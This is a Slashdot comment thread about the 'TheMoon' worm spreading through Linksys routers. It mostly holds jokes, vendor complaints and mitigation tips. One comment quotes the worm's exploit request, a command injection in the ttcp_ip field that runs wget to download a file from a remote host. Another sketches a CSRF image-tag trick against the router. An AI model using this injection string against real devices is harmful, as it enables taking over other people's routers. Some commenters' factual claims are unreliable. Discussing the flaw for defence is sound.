Linksys Routers Exploited By "TheMoon"

UnderAttack writes "A vulnerability in many Linksys routers, allowing for unauthenticated code execution, is being used to mass-exploit various Linksys routers right now. Infected routers will start scanning for vulnerable systems themselves, leading to a very fast spread of this 'worm.'"

That's impossible

[CajunArson]

Linksys routers run Linux and Linux is Open Source. Therefore there are no bugs because theoretically someone can look at the code and fix the code.

This also means that it's impossible for bad people to look at the code and exploit the code because Open Source makes everyone honest by magic.

Oh, and by virtue of being able to look at the code, Linksys routers magically patch themselves before the bugs even come into existence!

In conclusion, Windows is the cause of all security problems.

Re:That's impossible

Times like this, I wish I had mod points. That was amazing.

Re:That's impossible

OMG! now every linux device on earth will be compromised... run for the hills!!!

Re:That's impossible

[Zantac69]

Search your feelings, you know it to be true.

Re: That's impossible

Slow your roll there, not all linksys run linux. Most run vxworks rtos. Only the linksys routers flashed with ddwrt firmware run linux for sure.

Re:That's impossible

[Narcocide]

Only affecting models not running Linux currently...

Re:That's impossible

Also, Linksys is owned by Cisco. Cisco makes IOS for their routers. iOS is on iPhones. iPhones have never had a worm like this.

Ipso facto, this is unpossible

Re:That's impossible

OMG! now every iphone on earth will be compromised... run for the hills!!!

Re:That's impossible

Shh! Stop using facts, they only cloud your emotions!

Re:That's impossible

[gnick]

I tried to turn mine off, but it bit me! I tried throwing Androids at it, but zombies started flowing out of the Apple store to defend it!

Re:That's impossible

[X0563511]

Last I checked vxworks is not linux...

Re:That's impossible

[bobstreo]

Actually, linksys has been owned by Belkin for over a year:

http://www.bloomberg.com/news/...

Re:That's impossible

IOS is also the subset of AIX used to run the virtual I/O servers on POWER6 and newer. So, by this logic, I have to drop all my LPARs and demand POWER8 replacements once IBM ships those.

Or, I could just have one LPAR, and slice it up with WPARs...

Re:That's impossible

[operagost]

Join me, and we will h4x the galaxy as router and LAN.

Re:That's impossible

OMG! now every linux device on earth will be compromised... run for the hills!!!

And thus begins [glasses] the Fear of the Linux desktop.

Re:That's impossible

[operagost]

You are incorrect. It's my new open-source OS, VXINLX (aka VX is not linux) that is, of course, not Linux.

How to pronounce VXINLX is left as an exercise for the reader.

Re:That's impossible

[BronsCon]

What about WOPR?

Re:That's impossible

Cite?

Re:That's impossible

[FuegoFuerte]

As a result, there are now two brands of hardware that I will refuse to purchase. I swore off (and at) Belkin when I bought one of their APs and it wouldn't let me change the network for its management IP. It was hardcoded to 192.168.1.0/24, and their "customer service" response was "by design, FOAD."

I have a few of their surge suppressors, but generally anything with the Belkin name doesn't come into my house after that experience. Also, I'll never buy one of their PDUs for the datacenter - if their consumer support is that bad, why would I trust them in the enterprise?

Dear Businesses: Enterprise purchasing decisions are made by people who are also consumers who buy stuff for their homes.

Re:That's impossible

WOPR was temporarily infected by the "Thermonuclear War" virus.
Fortunately WOPR was replaced decades ago by Colossus and it's later SkyNet upgrade.

Re:That's impossible

You forgot the NSA factor....

Re:That's impossible

[BronsCon]

Last I checked, Skynet wasn't yet operational.

Re:That's impossible

Marry me!

Re:That's impossible

[silviuc]

Those mentioned in the posting run vxworks not linux. Troll better next time.

Re: That's impossible

[Mashiki]

Odd, I run tomato. Which is also 'nix, so saying that ddwrt is the only way for sure isn't true.

Re:That's impossible

*groan* that was awful.

Good, but awful.

Re:That's impossible

Pretty funny, but a sign of sad times. When hiking I always carry a bag and pick up plastic tossed by others. This is the philosophy of open source. We do not need license agreements to tell us that.

Sorry, the people who consider themselves geeks today have lost their integrity. They monetize the bugs as hackes or privacy violations.

Re: That's impossible

[tech.kyle]

I believe you're picking nits slightly. Regardless, you're totally right and the above AC is technically wrong. There are a good number of alternative router OSes available, many of which run *nix.

Re:That's impossible

[tech.kyle]

Just because some of their routers run *nix doesn't mean the software Linksys put on it is flawless. Doesn't matter what it's running if their grubby little hands were all over it.

Re:That's impossible

[tech.kyle]

Something something rotten Apple. *rimshot*

Re: That's impossible

LOL, you took the words out of my mouth

Re: That's impossible

He's saying moreso that the only surefire way to have a storebought linux linksys router is to purchase one of the pre-flashed ddwrt ones.

Re:That's impossible

[Technician]

Is this a case of default password, instead of a "Linux" vunerability?

Re:That's impossible

I swore off (and at) Belkin when I bought one of their APs and it wouldn't let me change the network for its management IP. It was hardcoded to 192.168.1.0/24, and their "customer service" response was "by design, FOAD."

Try a router/modem that doesn't allow you to turn off the wireless AP. And it has multiple APs, at least one that cannot be configured, and is a public access point.

Re:That's impossible

[JamieIanMacgregor]

apply hacksaw to antenna

Re:That's impossible

[FuegoFuerte]

Forget hacksaw, apply your favorite exploding target and a high power rifle. I guarantee it will be wireless, and no one will be accessing it anymore.

Re:That's impossible

[Elbart]

This drivel get's 3 points? /. is really dead.

poorly configured...

[crutchy]

...web server

56k Connections are still less safe

[BisuDagger]

I heard if you have a 56k connection that the NSA can listen to your internet.

Re:56k Connections are still less safe

[crutchy]

just don't verbally abuse your router because the FBI will bust down your door and drag you off to gitmo

Network company supplied routers vul'n

[RichMan]

Use this supplied router. Do NOT modify it.

But it has admin/admin as user name and password and is 192.168.1.1
Can I fix that.

Do NOT modify the settings on the supplied router.

*facepalm*

Re:Network company supplied routers vul'n

[SJHillman]

My ex-girlfriend's parents had a wireless router like that... both the wireless and web interface had default settings that they weren't supposed to change. And it gets better. Administration from the WAN side was enabled (supposedly for support). Yes, with the default UN/PW. Only Frontier could make TWC look somewhat competent.

Re:Network company supplied routers vul'n

That is why I have 3 routers nested on my network. 1 is supplied by the cable company. 2 is for guests, smartphones and what either may want to access and 3 is for my family's computers and all printers but one.

Re:Network company supplied routers vul'n

Frontier did that? I use Frontier FiOS and I have never used their shitbox freebie router. In fact, I've even managed to get tech support to work with me for ONT issues with an OpenBSD box sitting on the Ethernet port of the ONT, and got that replaced without them insisting I use their router or plug directly into a Windows box (shudder).

Re:Network company supplied routers vul'n

[Mashdar]

Is "network company" an ISP?

Re: Network company supplied routers vul'n

[Selivanow]

Frontier has become better about not requiring a windows box. I'm pretty sure this directly related to having "smarter" routers as opposed to just a "dumb" modem.

Maybe they started hiring smarter helpdesk techs again. I swear it all went downhill after I stopped working there (did I just admit to that?).

I remember helping walk customers through their dialup connection issues while beating my hi-score on Galaga.

Model Numbers of affected devices.

Here is a list of router models mentioned in the binary:
E4200
E3200
E3000
E2500
E2100L
E2000
E1550
E1500
E1200
E1000
E900

Re:Model Numbers of affected devices.

[mmell]

I couldn't determine (maybe I read too fast, missed it) . . . is this an exploit against those models as shipped, or is this an exploit against Linksys routers which have been flashed to run a more current version of DD-WRT? I suspect the former, but I can't confirm that.

If it's the former, then a software fix (flash to latest DD-WRT) is already available for those technically competent to implement it. If the latter . . . oi vey.

Re:Model Numbers of affected devices.

*sigh* I own one of those. Someone want to explain like I'm five on how to deal with this?

If it is "go buy a new router", I'll go do that tomorrow. Any you recommend? I bought Linksys because my previous Belkin was faulty. It seems like everything Belkin touches is faulty. So no Linksys, and no Belkin. Is Netgear still pretty good anymore?

I found open wrt website, but had no idea what I was supposed to do there.

Re:Model Numbers of affected devices.

I have an E3000.

According to Dr J: "The worm only scans port 80 and 8080 (http and https). Changing the port will prevent this attack. Restricting access to the admin interface by IP address will help as well. "
Also, replacing the stock firmware with DD-WRT would remove this vulnerability,

https://isc.sans.edu/forums/diary/Linksys+Worm+TheMoon+Summary+What+we+know+so+far/17633

Somebody had to do it

[SuperKendall]

Well I'm checking my router now and I don't see any is*#&$*#%(*#$# CARRIER MOONED

Re:Somebody had to do it

[WillAffleckUW]

Mine says "CHA1RF4CE CHIPENDALE"

Guess it's safe.

Re:Somebody had to do it

[ArsonSmith]

Hmm, Mine only says CHA

guess it got interrupted by the next tick prior to completion.

Re:Somebody had to do it

[Virtucon]

LOL I loved "The Tick"

Is dd-wrt affected?

[satuon]

I have a Linksys router with dd-wrt, would it be affected?

Re:Is dd-wrt affected?

I'm afraid your router is already dead.

Re:Is dd-wrt affected?

[CreamyG31337]

no, it's just the default firmware.
"Only routers running stock firmware are vulnerable. OpenWRT is not vulnerable to this issue."
from the comments on https://isc.sans.edu/forums/di...

Default firmware only?

[allcoolnameswheretak]

Does this also apply to LinkSys Routers that have been Tomatoed?

Re:Default firmware only?

[SJHillman]

No, but it does affect routers that have smiley face stickers applied to the top or sides.

Re:Default firmware only?

[Lothsahn]

I'd love to hear a response from a tomato dev, but I'm almost sure it's not (and dd-wrt is probably not affected either). With my Tomato router, I get a 404 when I reference that URL.

The worm infects a router with the following URL: submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2 &ttcp_ip=-h `cd /tmp;if [ ! -e .L26 ];then wget http://source/ IP]:193/0Rx.mid;fi` &StartEPI=1

It appears to be that the action is executing (at a shell) a portion of the ttcp_ip parameter. It appears it's a bug in the router's web application code itself, and not some sort of kernel-level vulnerability.

According to TFA

It may be related to these exploits...

Aren't you

[geekoid]

supposed to be boycotting?

Actually Belkin bought them from Cisco

[fullmetal55]

Belkin purchased Linksys from Cisco last year. Linksys no longer has ties to Cisco, thus the unpossible is now possible.

and Belkin routers have a lovely feature that lets you schedule an automatic reboot so that you don't have to manually do it anymore... Rather than fixing the firmware problem that requires the frequent reboots.

Re:Actually Belkin bought them from Cisco

[operagost]

As I stuffed DD-WRT onto my Netgear router the other day in the hope I wouldn't have to keep rebooting it, I wondered when someone would come up with this sad feature. I didn't have to wait long for my answer.

I miss my Motorolas that would never need to be rebooted. Alas, 802.11g wasn't cutting it anymore.

Re:Actually Belkin bought them from Cisco

[DigiShaman]

"I can't get online. Is the internet down again?"

"Did you forget to reboot the router - again?!"

Have no fear. Belkin is here! With this new firmware reboots are scheduled automatically! ***applause***
Now the entire family is happy again.

Re:Actually Belkin bought them from Cisco

[amicusNYCL]

Belkin purchased Linksys from Cisco last year.

Man, I don't think I was aware of that. So now I have to add Linksys to my list of brands to never purchase? This is getting too confusing.

Re:Actually Belkin bought them from Cisco

[Mashdar]

I ran a Buffalo WHR-G125 with DD-WRT without restarting it for years. There were times when I was on vacation with it unplugged, so I'm not sure what the maximum continuous uptime was, but I never once had an issue which required a restart.
Conclusion? Read reviews before you buy a router and see if people talk about having to restart it. They don't all need it. It's absurd that Linksys routers have been so bad for so long...

Re: Actually Belkin bought them from Cisco

What a stupid work around - instead of fixing the problems in the first place they just reboot the router periodically? stupid stupid stupid...

Re: Actually Belkin bought them from Cisco

[DigiShaman]

Who knows. It could have been to address a class action lawsuit on a near EOLed product. Sour the milk and all that. The "solution" is to repla...er...upgrade the device.

That, or the original dev was forced to focus further development and support on newer products.

Re: Actually Belkin bought them from Cisco

[tragedy]

Think it's stupid in routers? Patriot missile systems used to have a timing bug that would reduce accuracy the longer the unit was in operation. The bug was that the time in seconds since initialization was being converted from an int to a float and divided by 10, causing precision to go down as the time value went up. The inaccuracy was pronounced after 8 hours of continuous operation and the workaround was to restart the unit frequently (actually, it was apparently to assume that the units would be restarted frequently). As a result a unit that had been operating for 100+ hours failed to track an incoming scud missile and there were 126 US Army casualties (28 fatalities). That's the kind of software bug you can get worked up about! It is worth noting that they did actually patch it, and the patch was actually available before that incident, but had not yet been applied to that particular unit.

Re: Actually Belkin bought them from Cisco

[JamieIanMacgregor]

isn't it the same fix for windows server?

Re:Actually Belkin bought them from Cisco

Netgear WNR3500L/U/v2 here, currently 668 day uptime. That's exactly how long it's been since I bought it and slapped Tomato on it. It replaced a Belkin that had to be rebooted more and more frequently (daily, at the end), and then just died.

Re:Actually Belkin bought them from Cisco

[GNious]

From experience, Belkin also has a nice feature whereby wifi stops working after a certain amount of data has been transferred over it, requiring you to have a scheduled reboot setup for at least once a week.

Your routers are now ours, by way of our actions.

[RevWaldo]

On the Moon, nerds get their pants pulled down and they are spanked with Moon rocks.

.

It wasn't Trolling

Trolling: "Gee, LinkSys uses Linux and it's an open source product. So much for the myth (or bullshit) that open source is more secure!" Or "See, open source is shit! Closed source would never have had this happen to it because this exploit could only have been found by seeingt he source!"

The GP, OTOH, mixed satire and sarcasm - a la "The Daily Show" and "Colbert Report" to poke fun at the false sense of security one may have with using open source and that regardless of the product we use, we all need to be vigilant with our security. Who knows what the intention of this worm is.

Also, I took the GP's comment as a little teasing at the expense of some of the rapid members of the open source community and the folks seem to jump on all the Windows failings and yet, brush aside similar failings in open source software.

I thought it was quite clever on a multitude of levels while expressing in very simple sentences.

Comments below linked article.

That's where I got the list from for affected devices. Some other guy mentioned that the exploit used was in the WRT54G's (*gulp*) code.

Dodged that bullet

[Mike+Van+Pelt]

I'm sure glad I installed DDWRT on my E3000 about a year ago.

So what can be done?

The linked article is not very clear... is this a bug in the remote management code, or something else? If you have disabled remote management, is your router still vulnerable? What are some of the symptoms of infection?

Any comments welcome...

Re:So what can be done?

[the_skywise]

Disabling Remote management will help but not fully solve the problem.

For instance a cross-scripting attack via your web browser could attempt to inject the worm on your side.

My problem is I've got two... no three.. relatives/families scattered all over the US who are running an E4200, an E3000 and a WRT54G who all happily run amok letting javascript run higgeldy-piggledy because to block it messes up their web browsing experience. :(

"Higgeldy-piggledy means a real mess!"

TheMoon

[confused+one]

Jade Rabbit suffered a failure and needed additional processing resources. It has reached out and now All Your Base Are Belong to Jade.

Why is the admin port open to the public?

[EMG+at+MU]

The web administration port should not be open to the public internet by default on these routers.

Re:Why is the admin port open to the public?

The web administration port should not be open to the public internet by default on these routers.

If you can access it from your browser on the LAN, it is open to the public. Your browser accepts lists of URLs to load from any page you visit. Those URLs can trigger the flaw.

XSS + CSRF breaks the Intranet/Internet barrier. It is safer to assume such a barrier does not exist. Your router should be secure from malicious traffic on any interface.

Re:Why is the admin port open to the public?

[TheRealMindChild]

What? My E4200 immediately refuses connection on the WAN side if administration is disabled on such. What am I missing?

Re:Why is the admin port open to the public?

Read the parent post more closely. Your browser visits a malicious site (or a legit site with a malicious link/image in a combox), which causes the browser to hit the router's LAN side.

Re:Why is the admin port open to the public?

[TheRealMindChild]

Thanks

Re:Why is the admin port open to the public?

The web administration port should not be open to the public internet by default on these routers.

That infected Windows machine effectively renders your firewall useless. Welcome to the real world. Worms making tunnels.... who would have thought?

Router manufactures have been selling bullshit for years now. They think that everything on the NAT side is trustworthy. It's fucking lunacy. Router manufactures should design their admin interfaces with the same level of care and scrutiny that a public facing internet sight gets. One infected box on the "safe" side of your firewall makes your firewall non existent. End of story. It will happen. Count on it.

Your firewall is mostly useless these days. Crawl out from under your rock and realize that most of today's internet traffic is bot generated.

how can i tell if my router is affected?

[schlachter]

I have a WRT54 running the original linksys software.
I know you guys will say to push DDWRT onto it.
In any case, how can i tell if my router's been compromised?
It has been flakey lately but I figured that was just signal interference.

Re:how can i tell if my router is affected?

There's a small recessed reset button on the back of the router. You have to get a paper clip and try to push it in there. If the router starts saying "I'm sorry Dave, I can't let you do that," and hits you with an electric shock, it has been compromised.

Re:how can i tell if my router is affected?

[sleekware]

I have a WRT54 running the original linksys software. I know you guys will say to push DDWRT onto it. In any case, how can i tell if my router's been compromised? It has been flakey lately but I figured that was just signal interference.

Also running original firmware, with a newer Linksys. Short of doing the most reasonable thing and swapping out my firmware for third party, I'm thinking of upgrading to the latest manufacturers firmware and then treating the router's IP as an untrusted site in my browser, adding an exception only when I need to make a change. Perhaps this would thwart? Also not using the default IP, didn't see it mentioned if that would matter...

Re:how can i tell if my router is affected?

[IDtheTarget]

There's a small recessed reset button on the back of the router. You have to get a paper clip and try to push it in there. If the router starts saying "I'm sorry Dave, I can't let you do that," and hits you with an electric shock, it has been compromised.

Damn, the first time I can remember when I *actually* laughed out loud at a Slashdot post, and I'm without MOD points!

Nah, don't think so, sorry

You: HelloYou: A presales questionCherry Chris S. R: Hello ******.You: I can call you ChrisCherry Chris S. R: Sure.You: E4200
E3200
E3000
E2500You: just curious, can you tell from top of your head, if any of those models run some Linux distro on it by default factory settings?You: or they use some custom made Lynksys firmware?Cherry Chris S. R: Do you mean if these routers work with Linux?You: no, what is installed by defaultCherry Chris S. R: Linksys routers have there own firmware.You: can't seem to find it in FAQYou: ok, so those ones are custom Lynksys?Cherry Chris S. R: Yes.

pronunciation

[dkman]

Vixin Licks? just sayin'

One of these days, Alice!

One of these days, Alice!

POW!

ZOOM!

To the moon!

Re:One of these days, Alice!

[sideslash]

Sigh... at least quote it right. From Wikipedia:

"One of these days... POW!!! Right in the kisser!" or "BANG, ZOOM! Straight to the moon!", to which she usually replies, "Ahhh, shut up!"

Don't Encourage Them!

no, it's just the default firmware. "Only routers running stock firmware are vulnerable. OpenWRT is not vulnerable to this issue." from the comments on https://isc.sans.edu/forums/di...

Hee hee, you knew that because you bothered to click on the article. Good!

You comforted the lazy douchebaggery of another who couldn't be bothered. Bad!

Re:Don't Encourage Them!

Or you could say since CreamyG31337 had already searched the relavent information the did not force someone else to redo their work. Infomation wants to be free, they're just helping it escape :)

Better summary

[Logic+and+Reason]

https://isc.sans.edu/diary/Lin...

You got the correct message

[CajunArson]

I'm glad you got the satire... I've been running Linux on any machine under my direct control since 2000 and I did my Master's thesis by hacking on a Linux Security Module for domain & type enforcement back when the 2.6 Kernel was still in beta... so I'm not exactly shilling for Microsoft.

I'm also not a fan of complacency. While I really like that a whole lot of devices run Linux, if they can't be updated to address security issues in a very easy (even completely automated) manner, then Linux can be just as vulnerable as Windows or anything else.

Re:You got the correct message

[SQLGuru]

Yay for common sense (both you and Anonymous above). I run Windows....I have nothing against Linux, but working in Windows pays the bills. I patch regularly, I browse intelligently....and I haven't had a virus on *MY* machine since the Ping-Pong virus back in the DOS days.........(that was a cool virus, BTW).

Open Source isn't a cure-all. Neither is Closed Source. User behavior and knowledge is the best cure-all.

Re:You got the correct message

[JamieIanMacgregor]

These DOS anecdotes I enjoy so I'll add one of my own...I used to run windows (never used AV) but not any more, not due to security but just prefer linux... the last virus I can remember getting was 'stoned' - that one was just weird - pre win3. oh yeah, did have some outlook vbs thing at work once and replaced hundreds of bios chips after chernobyl and chased some worm around a school but never had them myself.

Re:Your routers are now ours, by way of our action

[iluvcapra]

That's no moon...

Wrong Icon.

Your icon is a catepillar, not a worm. Just sayin'.

TheMoon? We like the moon!

[93+Escort+Wagon]

Can't... help.... myself...

http://www.youtube.com/watch?v...

belkin

friends dont let friends buy belkin.

Agreed on Buffalo

[default+luser]

My HighPower N300 Gigabit DD-WRT has been completely stable to the point that I forget it's there. And if it wasn't, as the name implies I could fix any issues by upgrading to DD-WRT (this is a supported and warrantied mode).

This has been a fantastic experience, and it just makes we wonder why people persist in buying Linksys just for their name. Everyone has known for years that they are utter shit, but they keep buying the things!

hp firmware

This is why HP'S DECISION to charge for firmware updates as rediculious! They are charging people for there own mistakes

Re:Your routers are now ours, by way of our action

it's a space station!

mark calendar for firmware update, borrow junk unt

[raymorris]

Getting a Netgear WND3700 would solve the problem. That particular model is one I'm happy with , but there are plenty of perfectly fine routers around.

Linksys will probably put out an update that fixes the problem. You could mark your calendar for 30 days from now and Google search "update Linksys firmware to find illustrated instructions showing what buttons to press to do the update.

If you wish, you could use an old, cheap router while waiting for the update. Your friendly neighborhood geek probably has a few spares piled in a box somewhere.

img src=http://local/hack.cgi

[raymorris]

If you know any html, the subject line answers the question. If you don't, you might just have to trust that if I put something like the above in my web page, it causes visitors to hack their own router for me.

Re:img src=http://local/hack.cgi

http://slashdot.org/comments.p...

Re:mark calendar for firmware update, borrow junk

http://slashdot.org/comments.p...

DIfference

closed source can install holes, and no one in the wild becomes aware of it.

open-source is there for people to see, and can be exploited because of that.

And it seems the "anarchy" hackers go for the monopolies like MS and Apple, attack government sites, anything that one *could* call the "establishment" while "white collar" hackers go after anything that can make them a buck.
I would also point out that governments around the world and there spying agencies may also be openly targeting Linux to exploit, maybe in some campaign to expose Linux and get people to stick with closed source software.

Closed source can track and keep records of everything you are or have done, Window and XP's "hidden files" which are obviously buried deep within the system, reportedly records and saves everything you do, internet, notepad/wordpad, software installed, hardware, ect. I seen a listing of these files but haven't bothered to print them out or try to explore what they contain.

Im not sure if Linux is built to do the same! But I would agree no solution seems to be a sure thing.

The Corruption of The Idea and the support behind

The current issue about open source / the open idea about hardware as it sits is the programmers and the hardware enthusiast although it can be put the other way around many times, it can be just with people with an idea about software which can come up with a awesome design but before you know it is a hardware platform with many characteristics, look at the raspberry pi and gunstix projects an idea to bring people to the idea of micro electronics which has been a long time where people could even think about even touching this type of platform with out dropping a large sum of money but with the current rate of technology we are able to achieve what we haven't be-able to do in the past. The thing about hardware is that many corporations would not like to know who you are but to profit from every little thing you might come up with but that can be anyone ie: the IT Crowd HaHa, Linksys Router 54 G after it was yes hacked and yes ripped apart then rebuilt again using open source code it became a very useful and powerfull piece of hardware for the Mass's.

Belkin owns Linksys now

Need to catch up with the times. Linksys is now a belkin product line....

Agreed

It was certainly clever for a 14-year-old.

re

"Belkin routers have a lovely feature that lets you schedule an automatic reboot so that you don't have to manually do it anymore."

I sort of didn't believe you so I looked it up. That is priceless.

Not quite the case...

[Millennium]

Even if we limit our scope to routers-as-initially-purchased, there's still one stock model that runs Linux out of the box: the WRT54GL. It was made after Linksys otherwise switched to vxWorks, in an attempt to keep a hand in the Linux market.

I've got one. I flashed it with Tomato, but it definitely came with Linux on it.

Didn't they use a web based settings system

I seem to remember Linksys Routers using a web based settings system for users. The access was done through a web based menu. Not sure if this is how the exploit works? But I know at the time, many users were upset about the web access security issues that may come up.
Personally, I have not been real impressed with any router maker as they do not set their GUI and Firmware up very well these days. maybe because so much emphasis is placed on features and more settings that these systems are becoming more vulnerable.

But what about my Mac??

[bananahead]

But, but, but, do I need antivirus for my Mac?? (wait for it).... NO, Macs don't get viruses!!!! (this has little to do with the actual topic here, just trying to add to the hysteria)

NoScript ABE for the win

[Candyman_JAC]

NoScript in FireFox provides an Application Boundary Enforcer with a rule to block access to Local resources from the WAN. The rule looks like this:

# This one guards the local network, like LocalRodeo
# LOCAL is a placeholder which matches all the LAN
# subnets (possibly configurable) and localhost
Site LOCAL
Accept from LOCAL
Deny

I have not tested, but I think this will prevent a malicious website from exploiting this vulnerability

Re:raymorris: the 'great gov't coder' (lol, not)

The coward apk got called out and has no response.

Re:raymorris: the 'great gov't coder' (lol, not)

raymorris, quit playing jailhouse lawyer by ac http://news.slashdot.org/comme...

Redirected to beta from RSS

How do I get off the beta page?

Re:Redirected to beta from RSS

[crutchy]

try clicking the X in the top right corner of the browser window

or change the URL from beta.slashdot.org to www.slashdot.org

if you're on a mobile, not sure... you may be stuffed there, but slashdot has always been pretty shit on a mobile

Dont lie!

Skynet, is that you?

Re:Dont lie!

[BronsCon]

Why, oh why do I keep coming here?

That's right, shit like this.

Thanks :)

Linux =/= whole firmware

Linux is open source, but Linksys' firmware isn't. And this exploit resides in tmUnblock.cgi, which is part of firmware, not kernel. Simple as that.